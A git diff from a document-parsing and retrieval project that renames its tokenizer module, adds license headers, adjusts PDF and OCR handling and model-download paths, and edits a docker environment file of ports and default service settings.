len(tks_down) == 1 and rag_tokenizer.tag(tks_down[0]).find("n") >= 0,
|
||||
len(tks_up) == 1 and rag_tokenizer.tag(tks_up[0]).find("n") >= 0
|
||||
]
|
||||
return fea
|
||||
|
||||
@ -392,11 +404,11 @@ class HuParser:
|
||||
b["text"].strip()[-1] in ",;:'\",、‘“;:-",
|
||||
len(b["text"].strip()) > 1 and b["text"].strip(
|
||||
)[-2] in ",;:'\",‘“、;:",
|
||||
b["text"].strip()[0] in "。;?!?”)),,、:",
|
||||
b_["text"].strip() and b_["text"].strip()[0] in "。;?!?”)),,、:",
|
||||
]
|
||||
# features for not concating
|
||||
feats = [
|
||||
b.get("layoutno", 0) != b.get("layoutno", 0),
|
||||
b.get("layoutno", 0) != b_.get("layoutno", 0),
|
||||
b["text"].strip()[-1] in "。?!?",
|
||||
self.is_english and b["text"].strip()[-1] in ".!?",
|
||||
b["page_number"] == b_["page_number"] and b_["top"] -
|
||||
@ -469,7 +481,8 @@ class HuParser:
|
||||
continue
|
||||
|
||||
if re.match(r"[0-9]{2,3}/[0-9]{3}$", up["text"]) \
|
||||
or re.match(r"[0-9]{2,3}/[0-9]{3}$", down["text"]):
|
||||
or re.match(r"[0-9]{2,3}/[0-9]{3}$", down["text"]) \
|
||||
or not down["text"].strip():
|
||||
i += 1
|
||||
continue
|
||||
|
||||
@ -597,7 +610,7 @@ class HuParser:
|
||||
|
||||
if b["text"].strip()[0] != b_["text"].strip()[0] \
|
||||
or b["text"].strip()[0].lower() in set("qwertyuopasdfghjklzxcvbnm") \
|
||||
or huqie.is_chinese(b["text"].strip()[0]) \
|
||||
or rag_tokenizer.is_chinese(b["text"].strip()[0]) \
|
||||
or b["top"] > b_["bottom"]:
|
||||
i += 1
|
||||
continue
|
||||
@ -748,6 +761,7 @@ class HuParser:
|
||||
"layoutno", "")))
|
||||
|
||||
left, top, right, bott = b["x0"], b["top"], b["x1"], b["bottom"]
|
||||
if right < left: right = left + 1
|
||||
poss.append((pn + self.page_from, left, right, top, bott))
|
||||
return self.page_images[pn] \
|
||||
.crop((left * ZM, top * ZM,
|
||||
@ -828,9 +842,13 @@ class HuParser:
|
||||
pn = [bx["page_number"]]
|
||||
top = bx["top"] - self.page_cum_height[pn[0] - 1]
|
||||
bott = bx["bottom"] - self.page_cum_height[pn[0] - 1]
|
||||
page_images_cnt = len(self.page_images)
|
||||
if pn[-1] - 1 >= page_images_cnt: return ""
|
||||
while bott * ZM > self.page_images[pn[-1] - 1].size[1]:
|
||||
bott -= self.page_images[pn[-1] - 1].size[1] / ZM
|
||||
pn.append(pn[-1] + 1)
|
||||
if pn[-1] - 1 >= page_images_cnt:
|
||||
return ""
|
||||
|
||||
return "@@{}\t{:.1f}\t{:.1f}\t{:.1f}\t{:.1f}##" \
|
||||
.format("-".join([str(p) for p in pn]),
|
||||
@ -916,9 +934,7 @@ class HuParser:
|
||||
fnm) if not binary else pdfplumber.open(BytesIO(binary))
|
||||
return len(pdf.pages)
|
||||
except Exception as e:
|
||||
pdf = fitz.open(fnm) if not binary else fitz.open(
|
||||
stream=fnm, filetype="pdf")
|
||||
return len(pdf)
|
||||
logging.error(str(e))
|
||||
|
||||
def __images__(self, fnm, zoomin=3, page_from=0,
|
||||
page_to=299, callback=None):
|
||||
@ -930,32 +946,17 @@ class HuParser:
|
||||
self.page_cum_height = [0]
|
||||
self.page_layout = []
|
||||
self.page_from = page_from
|
||||
st = timer()
|
||||
try:
|
||||
self.pdf = pdfplumber.open(fnm) if isinstance(
|
||||
fnm, str) else pdfplumber.open(BytesIO(fnm))
|
||||
self.page_images = [p.to_image(resolution=72 * zoomin).annotated for i, p in
|
||||
enumerate(self.pdf.pages[page_from:page_to])]
|
||||
self.page_chars = [[c for c in page.chars if self._has_color(c)] for page in
|
||||
self.page_chars = [[{**c, 'top': max(0, c['top'] - 10), 'bottom': max(0, c['bottom'] - 10)} for c in page.chars if self._has_color(c)] for page in
|
||||
self.pdf.pages[page_from:page_to]]
|
||||
self.total_page = len(self.pdf.pages)
|
||||
except Exception as e:
|
||||
self.pdf = fitz.open(fnm) if isinstance(
|
||||
fnm, str) else fitz.open(
|
||||
stream=fnm, filetype="pdf")
|
||||
self.page_images = []
|
||||
self.page_chars = []
|
||||
mat = fitz.Matrix(zoomin, zoomin)
|
||||
self.total_page = len(self.pdf)
|
||||
for i, page in enumerate(self.pdf):
|
||||
if i < page_from:
|
||||
continue
|
||||
if i >= page_to:
|
||||
break
|
||||
pix = page.get_pixmap(matrix=mat)
|
||||
img = Image.frombytes("RGB", [pix.width, pix.height],
|
||||
pix.samples)
|
||||
self.page_images.append(img)
|
||||
self.page_chars.append([])
|
||||
logging.error(str(e))
|
||||
|
||||
self.outlines = []
|
||||
try:
|
||||
@ -968,6 +969,7 @@ class HuParser:
|
||||
self.outlines.append((a["/Title"], depth))
|
||||
continue
|
||||
dfs(a, depth + 1)
|
||||
|
||||
dfs(outlines, 0)
|
||||
except Exception as e:
|
||||
logging.warning(f"Outlines exception: {e}")
|
||||
@ -983,7 +985,9 @@ class HuParser:
|
||||
self.is_english = True
|
||||
else:
|
||||
self.is_english = False
|
||||
self.is_english = False
|
||||
|
||||
st = timer()
|
||||
for i, img in enumerate(self.page_images):
|
||||
chars = self.page_chars[i] if not self.is_english else []
|
||||
self.mean_height.append(
|
||||
@ -1001,15 +1005,11 @@ class HuParser:
|
||||
chars[j]["width"]) / 2:
|
||||
chars[j]["text"] += " "
|
||||
j += 1
|
||||
# if i > 0:
|
||||
# if not chars:
|
||||
# self.page_cum_height.append(img.size[1] / zoomin)
|
||||
# else:
|
||||
# self.page_cum_height.append(
|
||||
# np.max([c["bottom"] for c in chars]))
|
||||
|
||||
self.__ocr(i + 1, img, chars, zoomin)
|
||||
if callback:
|
||||
if callback and i % 6 == 5:
|
||||
callback(prog=(i + 1) * 0.6 / len(self.page_images), msg="")
|
||||
# print("OCR:", timer()-st)
|
||||
|
||||
if not self.is_english and not any(
|
||||
[c for c in self.page_chars]) and self.boxes:
|
||||
@ -1021,6 +1021,8 @@ class HuParser:
|
||||
|
||||
self.page_cum_height = np.cumsum(self.page_cum_height)
|
||||
assert len(self.page_cum_height) == len(self.page_images) + 1
|
||||
if len(self.boxes) == 0 and zoomin < 9: self.__images__(fnm, zoomin * 3, page_from,
|
||||
page_to, callback)
|
||||
|
||||
def __call__(self, fnm, need_image=True, zoomin=3, return_html=False):
|
||||
self.__images__(fnm, zoomin)
|
||||
|
||||
@ -10,11 +10,12 @@
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
from io import BytesIO
|
||||
from pptx import Presentation
|
||||
|
||||
|
||||
class HuPptParser(object):
|
||||
class RAGFlowPptParser(object):
|
||||
def __init__(self):
|
||||
super().__init__()
|
||||
|
||||
|
||||
@ -1,3 +1,16 @@
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
import datetime
|
||||
|
||||
|
||||
|
||||
@ -1,6 +1,19 @@
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
import re,json,os
|
||||
import pandas as pd
|
||||
from rag.nlp import huqie
|
||||
from rag.nlp import rag_tokenizer
|
||||
from . import regions
|
||||
current_file_path = os.path.dirname(os.path.abspath(__file__))
|
||||
GOODS = pd.read_csv(os.path.join(current_file_path, "res/corp_baike_len.csv"), sep="\t", header=0).fillna(0)
|
||||
@ -22,14 +35,14 @@ def baike(cid, default_v=0):
|
||||
def corpNorm(nm, add_region=True):
|
||||
global CORP_TKS
|
||||
if not nm or type(nm)!=type(""):return ""
|
||||
nm = huqie.tradi2simp(huqie.strQ2B(nm)).lower()
|
||||
nm = rag_tokenizer.tradi2simp(rag_tokenizer.strQ2B(nm)).lower()
|
||||
nm = re.sub(r"&", "&", nm)
|
||||
nm = re.sub(r"[\(\)()\+'\"\t \*\\【】-]+", " ", nm)
|
||||
nm = re.sub(r"([—-]+.*| +co\..*|corp\..*| +inc\..*| +ltd.*)", "", nm, 10000, re.IGNORECASE)
|
||||
nm = re.sub(r"(计算机|技术|(技术|科技|网络)*有限公司|公司|有限|研发中心|中国|总部)$", "", nm, 10000, re.IGNORECASE)
|
||||
if not nm or (len(nm)<5 and not regions.isName(nm[0:2])):return nm
|
||||
|
||||
tks = huqie.qie(nm).split(" ")
|
||||
tks = rag_tokenizer.tokenize(nm).split(" ")
|
||||
reg = [t for i,t in enumerate(tks) if regions.isName(t) and (t != "中国" or i > 0)]
|
||||
nm = ""
|
||||
for t in tks:
|
||||
|
||||
@ -1,3 +1,16 @@
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
TBL = {"94":"EMBA",
|
||||
"6":"MBA",
|
||||
"95":"MPA",
|
||||
|
||||
@ -1,3 +1,15 @@
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
TBL = {"1":{"name":"IT/通信/电子","parent":"0"},
|
||||
"2":{"name":"互联网","parent":"0"},
|
||||
|
||||
@ -1,3 +1,16 @@
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
TBL = {
|
||||
"2":{"name":"北京","parent":"1"},
|
||||
"3":{"name":"天津","parent":"1"},
|
||||
|
||||
@ -1,4 +1,16 @@
|
||||
# -*- coding: UTF-8 -*-
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
import os, json,re,copy
|
||||
import pandas as pd
|
||||
current_file_path = os.path.dirname(os.path.abspath(__file__))
|
||||
|
||||
@ -1,4 +1,16 @@
|
||||
# -*- coding: utf-8 -*-
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
import json
|
||||
from deepdoc.parser.resume.entities import degrees, regions, industries
|
||||
|
||||
|
||||
@ -1,9 +1,21 @@
|
||||
# -*- coding: utf-8 -*-
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
import re, copy, time, datetime, demjson3, \
|
||||
traceback, signal
|
||||
import numpy as np
|
||||
from deepdoc.parser.resume.entities import degrees, schools, corporations
|
||||
from rag.nlp import huqie, surname
|
||||
from rag.nlp import rag_tokenizer, surname
|
||||
from xpinyin import Pinyin
|
||||
from contextlib import contextmanager
|
||||
|
||||
@ -83,7 +95,7 @@ def forEdu(cv):
|
||||
if n.get("school_name") and isinstance(n["school_name"], str):
|
||||
sch.append(re.sub(r"(211|985|重点大学|[,&;;-])", "", n["school_name"]))
|
||||
e["sch_nm_kwd"] = sch[-1]
|
||||
fea.append(huqie.qieqie(huqie.qie(n.get("school_name", ""))).split(" ")[-1])
|
||||
fea.append(rag_tokenizer.fine_grained_tokenize(rag_tokenizer.tokenize(n.get("school_name", ""))).split(" ")[-1])
|
||||
|
||||
if n.get("discipline_name") and isinstance(n["discipline_name"], str):
|
||||
maj.append(n["discipline_name"])
|
||||
@ -166,10 +178,10 @@ def forEdu(cv):
|
||||
if "tag_kwd" not in cv: cv["tag_kwd"] = []
|
||||
if "好学历" not in cv["tag_kwd"]: cv["tag_kwd"].append("好学历")
|
||||
|
||||
if cv.get("major_kwd"): cv["major_tks"] = huqie.qie(" ".join(maj))
|
||||
if cv.get("school_name_kwd"): cv["school_name_tks"] = huqie.qie(" ".join(sch))
|
||||
if cv.get("first_school_name_kwd"): cv["first_school_name_tks"] = huqie.qie(" ".join(fsch))
|
||||
if cv.get("first_major_kwd"): cv["first_major_tks"] = huqie.qie(" ".join(fmaj))
|
||||
if cv.get("major_kwd"): cv["major_tks"] = rag_tokenizer.tokenize(" ".join(maj))
|
||||
if cv.get("school_name_kwd"): cv["school_name_tks"] = rag_tokenizer.tokenize(" ".join(sch))
|
||||
if cv.get("first_school_name_kwd"): cv["first_school_name_tks"] = rag_tokenizer.tokenize(" ".join(fsch))
|
||||
if cv.get("first_major_kwd"): cv["first_major_tks"] = rag_tokenizer.tokenize(" ".join(fmaj))
|
||||
|
||||
return cv
|
||||
|
||||
@ -187,11 +199,11 @@ def forProj(cv):
|
||||
if n.get("achivement"): desc.append(str(n["achivement"]))
|
||||
|
||||
if pro_nms:
|
||||
# cv["pro_nms_tks"] = huqie.qie(" ".join(pro_nms))
|
||||
cv["project_name_tks"] = huqie.qie(pro_nms[0])
|
||||
# cv["pro_nms_tks"] = rag_tokenizer.tokenize(" ".join(pro_nms))
|
||||
cv["project_name_tks"] = rag_tokenizer.tokenize(pro_nms[0])
|
||||
if desc:
|
||||
cv["pro_desc_ltks"] = huqie.qie(rmHtmlTag(" ".join(desc)))
|
||||
cv["project_desc_ltks"] = huqie.qie(rmHtmlTag(desc[0]))
|
||||
cv["pro_desc_ltks"] = rag_tokenizer.tokenize(rmHtmlTag(" ".join(desc)))
|
||||
cv["project_desc_ltks"] = rag_tokenizer.tokenize(rmHtmlTag(desc[0]))
|
||||
|
||||
return cv
|
||||
|
||||
@ -280,25 +292,25 @@ def forWork(cv):
|
||||
if fea["corporation_id"]: cv["corporation_id"] = fea["corporation_id"]
|
||||
|
||||
if fea["position_name"]:
|
||||
cv["position_name_tks"] = huqie.qie(fea["position_name"][0])
|
||||
cv["position_name_sm_tks"] = huqie.qieqie(cv["position_name_tks"])
|
||||
cv["pos_nm_tks"] = huqie.qie(" ".join(fea["position_name"][1:]))
|
||||
cv["position_name_tks"] = rag_tokenizer.tokenize(fea["position_name"][0])
|
||||
cv["position_name_sm_tks"] = rag_tokenizer.fine_grained_tokenize(cv["position_name_tks"])
|
||||
cv["pos_nm_tks"] = rag_tokenizer.tokenize(" ".join(fea["position_name"][1:]))
|
||||
|
||||
if fea["industry_name"]:
|
||||
cv["industry_name_tks"] = huqie.qie(fea["industry_name"][0])
|
||||
cv["industry_name_sm_tks"] = huqie.qieqie(cv["industry_name_tks"])
|
||||
cv["indu_nm_tks"] = huqie.qie(" ".join(fea["industry_name"][1:]))
|
||||
cv["industry_name_tks"] = rag_tokenizer.tokenize(fea["industry_name"][0])
|
||||
cv["industry_name_sm_tks"] = rag_tokenizer.fine_grained_tokenize(cv["industry_name_tks"])
|
||||
cv["indu_nm_tks"] = rag_tokenizer.tokenize(" ".join(fea["industry_name"][1:]))
|
||||
|
||||
if fea["corporation_name"]:
|
||||
cv["corporation_name_kwd"] = fea["corporation_name"][0]
|
||||
cv["corp_nm_kwd"] = fea["corporation_name"]
|
||||
cv["corporation_name_tks"] = huqie.qie(fea["corporation_name"][0])
|
||||
cv["corporation_name_sm_tks"] = huqie.qieqie(cv["corporation_name_tks"])
|
||||
cv["corp_nm_tks"] = huqie.qie(" ".join(fea["corporation_name"][1:]))
|
||||
cv["corporation_name_tks"] = rag_tokenizer.tokenize(fea["corporation_name"][0])
|
||||
cv["corporation_name_sm_tks"] = rag_tokenizer.fine_grained_tokenize(cv["corporation_name_tks"])
|
||||
cv["corp_nm_tks"] = rag_tokenizer.tokenize(" ".join(fea["corporation_name"][1:]))
|
||||
|
||||
if fea["responsibilities"]:
|
||||
cv["responsibilities_ltks"] = huqie.qie(fea["responsibilities"][0])
|
||||
cv["resp_ltks"] = huqie.qie(" ".join(fea["responsibilities"][1:]))
|
||||
cv["responsibilities_ltks"] = rag_tokenizer.tokenize(fea["responsibilities"][0])
|
||||
cv["resp_ltks"] = rag_tokenizer.tokenize(" ".join(fea["responsibilities"][1:]))
|
||||
|
||||
if fea["subordinates_count"]: fea["subordinates_count"] = [int(i) for i in fea["subordinates_count"] if
|
||||
re.match(r"[^0-9]+$", str(i))]
|
||||
@ -444,15 +456,15 @@ def parse(cv):
|
||||
if nms:
|
||||
t = k[:-4]
|
||||
cv[f"{t}_kwd"] = nms
|
||||
cv[f"{t}_tks"] = huqie.qie(" ".join(nms))
|
||||
cv[f"{t}_tks"] = rag_tokenizer.tokenize(" ".join(nms))
|
||||
except Exception as e:
|
||||
print("【EXCEPTION】:", str(traceback.format_exc()), cv[k])
|
||||
cv[k] = []
|
||||
|
||||
# tokenize fields
|
||||
if k in tks_fld:
|
||||
cv[f"{k}_tks"] = huqie.qie(cv[k])
|
||||
if k in small_tks_fld: cv[f"{k}_sm_tks"] = huqie.qie(cv[f"{k}_tks"])
|
||||
cv[f"{k}_tks"] = rag_tokenizer.tokenize(cv[k])
|
||||
if k in small_tks_fld: cv[f"{k}_sm_tks"] = rag_tokenizer.tokenize(cv[f"{k}_tks"])
|
||||
|
||||
# keyword fields
|
||||
if k in kwd_fld: cv[f"{k}_kwd"] = [n.lower()
|
||||
@ -492,7 +504,7 @@ def parse(cv):
|
||||
cv["name_kwd"] = name
|
||||
cv["name_pinyin_kwd"] = PY.get_pinyins(nm[:20], ' ')[:3]
|
||||
cv["name_tks"] = (
|
||||
huqie.qie(name) + " " + (" ".join(list(name)) if not re.match(r"[a-zA-Z ]+$", name) else "")
|
||||
rag_tokenizer.tokenize(name) + " " + (" ".join(list(name)) if not re.match(r"[a-zA-Z ]+$", name) else "")
|
||||
) if name else ""
|
||||
else:
|
||||
cv["integerity_flt"] /= 2.
|
||||
@ -515,7 +527,7 @@ def parse(cv):
|
||||
cv["updated_at_dt"] = f"%s-%02d-%02d 00:00:00" % (y, int(m), int(d))
|
||||
# long text tokenize
|
||||
|
||||
if cv.get("responsibilities"): cv["responsibilities_ltks"] = huqie.qie(rmHtmlTag(cv["responsibilities"]))
|
||||
if cv.get("responsibilities"): cv["responsibilities_ltks"] = rag_tokenizer.tokenize(rmHtmlTag(cv["responsibilities"]))
|
||||
|
||||
# for yes or no field
|
||||
fea = []
|
||||
|
||||
@ -1,12 +1,26 @@
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
import pdfplumber
|
||||
|
||||
from .ocr import OCR
|
||||
from .recognizer import Recognizer
|
||||
from .layout_recognizer import LayoutRecognizer
|
||||
from .table_structure_recognizer import TableStructureRecognizer
|
||||
|
||||
|
||||
def init_in_out(args):
|
||||
from PIL import Image
|
||||
import fitz
|
||||
import os
|
||||
import traceback
|
||||
from api.utils.file_utils import traversal_files
|
||||
@ -18,13 +32,11 @@ def init_in_out(args):
|
||||
|
||||
def pdf_pages(fnm, zoomin=3):
|
||||
nonlocal outputs, images
|
||||
pdf = fitz.open(fnm)
|
||||
mat = fitz.Matrix(zoomin, zoomin)
|
||||
for i, page in enumerate(pdf):
|
||||
pix = page.get_pixmap(matrix=mat)
|
||||
img = Image.frombytes("RGB", [pix.width, pix.height],
|
||||
pix.samples)
|
||||
images.append(img)
|
||||
pdf = pdfplumber.open(fnm)
|
||||
images = [p.to_image(resolution=72 * zoomin).annotated for i, p in
|
||||
enumerate(pdf.pages)]
|
||||
|
||||
for i, page in enumerate(images):
|
||||
outputs.append(os.path.split(fnm)[-1] + f"_{i}.jpg")
|
||||
|
||||
def images_and_outputs(fnm):
|
||||
|
||||
@ -43,7 +43,9 @@ class LayoutRecognizer(Recognizer):
|
||||
"rag/res/deepdoc")
|
||||
super().__init__(self.labels, domain, model_dir)
|
||||
except Exception as e:
|
||||
model_dir = snapshot_download(repo_id="InfiniFlow/deepdoc")
|
||||
model_dir = snapshot_download(repo_id="InfiniFlow/deepdoc",
|
||||
local_dir=os.path.join(get_project_base_directory(), "rag/res/deepdoc"),
|
||||
local_dir_use_symlinks=False)
|
||||
super().__init__(self.labels, domain, model_dir)
|
||||
|
||||
self.garbage_layouts = ["footer", "header", "reference"]
|
||||
|
||||
@ -486,7 +486,9 @@ class OCR(object):
|
||||
self.text_detector = TextDetector(model_dir)
|
||||
self.text_recognizer = TextRecognizer(model_dir)
|
||||
except Exception as e:
|
||||
model_dir = snapshot_download(repo_id="InfiniFlow/deepdoc")
|
||||
model_dir = snapshot_download(repo_id="InfiniFlow/deepdoc",
|
||||
local_dir=os.path.join(get_project_base_directory(), "rag/res/deepdoc"),
|
||||
local_dir_use_symlinks=False)
|
||||
self.text_detector = TextDetector(model_dir)
|
||||
self.text_recognizer = TextRecognizer(model_dir)
|
||||
|
||||
|
||||
@ -1,5 +1,18 @@
|
||||
import copy
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
import copy
|
||||
import re
|
||||
import numpy as np
|
||||
import cv2
|
||||
from shapely.geometry import Polygon
|
||||
|
||||
@ -41,7 +41,9 @@ class Recognizer(object):
|
||||
"rag/res/deepdoc")
|
||||
model_file_path = os.path.join(model_dir, task_name + ".onnx")
|
||||
if not os.path.exists(model_file_path):
|
||||
model_dir = snapshot_download(repo_id="InfiniFlow/deepdoc")
|
||||
model_dir = snapshot_download(repo_id="InfiniFlow/deepdoc",
|
||||
local_dir=os.path.join(get_project_base_directory(), "rag/res/deepdoc"),
|
||||
local_dir_use_symlinks=False)
|
||||
model_file_path = os.path.join(model_dir, task_name + ".onnx")
|
||||
else:
|
||||
model_file_path = os.path.join(model_dir, task_name + ".onnx")
|
||||
|
||||
@ -11,10 +11,6 @@
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
from deepdoc.vision.seeit import draw_box
|
||||
from deepdoc.vision import OCR, init_in_out
|
||||
import argparse
|
||||
import numpy as np
|
||||
import os
|
||||
import sys
|
||||
sys.path.insert(
|
||||
@ -25,6 +21,11 @@ sys.path.insert(
|
||||
os.path.abspath(__file__)),
|
||||
'../../')))
|
||||
|
||||
from deepdoc.vision.seeit import draw_box
|
||||
from deepdoc.vision import OCR, init_in_out
|
||||
import argparse
|
||||
import numpy as np
|
||||
|
||||
|
||||
def main(args):
|
||||
ocr = OCR()
|
||||
|
||||
@ -10,17 +10,7 @@
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
from deepdoc.vision.seeit import draw_box
|
||||
from deepdoc.vision import Recognizer, LayoutRecognizer, TableStructureRecognizer, OCR, init_in_out
|
||||
from api.utils.file_utils import get_project_base_directory
|
||||
import argparse
|
||||
import os
|
||||
import sys
|
||||
import re
|
||||
|
||||
import numpy as np
|
||||
|
||||
import os, sys
|
||||
sys.path.insert(
|
||||
0,
|
||||
os.path.abspath(
|
||||
@ -29,6 +19,13 @@ sys.path.insert(
|
||||
os.path.abspath(__file__)),
|
||||
'../../')))
|
||||
|
||||
from deepdoc.vision.seeit import draw_box
|
||||
from deepdoc.vision import Recognizer, LayoutRecognizer, TableStructureRecognizer, OCR, init_in_out
|
||||
from api.utils.file_utils import get_project_base_directory
|
||||
import argparse
|
||||
import re
|
||||
import numpy as np
|
||||
|
||||
|
||||
def main(args):
|
||||
images, outputs = init_in_out(args)
|
||||
|
||||
@ -19,7 +19,7 @@ import numpy as np
|
||||
from huggingface_hub import snapshot_download
|
||||
|
||||
from api.utils.file_utils import get_project_base_directory
|
||||
from rag.nlp import huqie
|
||||
from rag.nlp import rag_tokenizer
|
||||
from .recognizer import Recognizer
|
||||
|
||||
|
||||
@ -39,7 +39,9 @@ class TableStructureRecognizer(Recognizer):
|
||||
get_project_base_directory(),
|
||||
"rag/res/deepdoc"))
|
||||
except Exception as e:
|
||||
super().__init__(self.labels, "tsr", snapshot_download(repo_id="InfiniFlow/deepdoc"))
|
||||
super().__init__(self.labels, "tsr", snapshot_download(repo_id="InfiniFlow/deepdoc",
|
||||
local_dir=os.path.join(get_project_base_directory(), "rag/res/deepdoc"),
|
||||
local_dir_use_symlinks=False))
|
||||
|
||||
def __call__(self, images, thr=0.2):
|
||||
tbls = super().__call__(images, thr)
|
||||
@ -115,14 +117,14 @@ class TableStructureRecognizer(Recognizer):
|
||||
for p, n in patt:
|
||||
if re.search(p, b["text"].strip()):
|
||||
return n
|
||||
tks = [t for t in huqie.qie(b["text"]).split(" ") if len(t) > 1]
|
||||
tks = [t for t in rag_tokenizer.tokenize(b["text"]).split(" ") if len(t) > 1]
|
||||
if len(tks) > 3:
|
||||
if len(tks) < 12:
|
||||
return "Tx"
|
||||
else:
|
||||
return "Lx"
|
||||
|
||||
if len(tks) == 1 and huqie.tag(tks[0]) == "nr":
|
||||
if len(tks) == 1 and rag_tokenizer.tag(tks[0]) == "nr":
|
||||
return "Nr"
|
||||
|
||||
return "Ot"
|
||||
|
||||
18
docker/.env
18
docker/.env
@ -1,26 +1,38 @@
|
||||
# Version of Elastic products
|
||||
STACK_VERSION=8.11.3
|
||||
|
||||
# Set the cluster name
|
||||
CLUSTER_NAME=rag_flow
|
||||
|
||||
# Port to expose Elasticsearch HTTP API to the host
|
||||
ES_PORT=1200
|
||||
|
||||
# Set the Elasticsearch password
|
||||
ELASTIC_PASSWORD=infini_rag_flow
|
||||
|
||||
# Port to expose Kibana to the host
|
||||
KIBANA_PORT=6601
|
||||
|
||||
# Increase or decrease based on the available host memory (in bytes)
|
||||
MEM_LIMIT=4073741824
|
||||
|
||||
MEM_LIMIT=8073741824
|
||||
|
||||
|
||||
MYSQL_PASSWORD=infini_rag_flow
|
||||
MYSQL_PORT=5455
|
||||
|
||||
# Port to expose minio to the host
|
||||
MINIO_CONSOLE_PORT=9001
|
||||
MINIO_PORT=9000
|
||||
|
||||
MINIO_USER=rag_flow
|
||||
MINIO_PASSWORD=infini_rag_flow
|
||||
|
||||
REDIS_PORT=6379
|
||||
REDIS_PASSWORD=infini_rag_flow
|
||||
|
||||
SVR_HTTP_PORT=9380
|
||||
|
||||
RAGFLOW_VERSION=dev
|
||||
|
||||
TIMEZONE='Asia/Shanghai'
|
||||
|
||||
######## OS setup for ES ###########
